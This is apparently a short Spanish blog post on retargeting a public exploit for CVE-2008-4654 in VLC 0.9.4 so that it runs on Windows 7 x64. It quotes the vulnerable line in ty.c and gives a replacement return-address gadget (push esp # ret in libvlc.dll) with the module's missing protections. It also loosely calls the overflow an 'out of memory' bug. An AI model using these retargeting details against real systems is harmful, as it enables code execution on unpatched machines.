
Un EXP podría ejecutarse en Windows x64 contra CVE-2008-4654.
Bueno, es solo una vulnerabilidad antigua cuyo número CVE es CVE-2008-4654. Esta vulnerabilidad está causada por falta de memoria (Out of Memory) en la línea 1650 de modules/demux/ty.c.
stream_Read(p_demux->s, mst_buf, 8 + i_map_size);
Cuando descargué el EXP de otros sitios web, descubrí que no funcionaba correctamente en mi Windows 7 Ultimate x64. Así que cambié la dirección de retorno de 0x68f0cfad a 0x6a314b52, ¡y funcionó!
Antiguo:
0x68f0cfad : jmp esp
{PAGE_EXECUTE_READ} [libqt4_plugin.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
Después de descubrir que ese módulo no existe, cambié a:
0x6a314b52 : push esp # ret
{PAGE_EXECUTE_READ} [libvlc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False
Funciona en VLC 0.9.4. ¡Diviértete!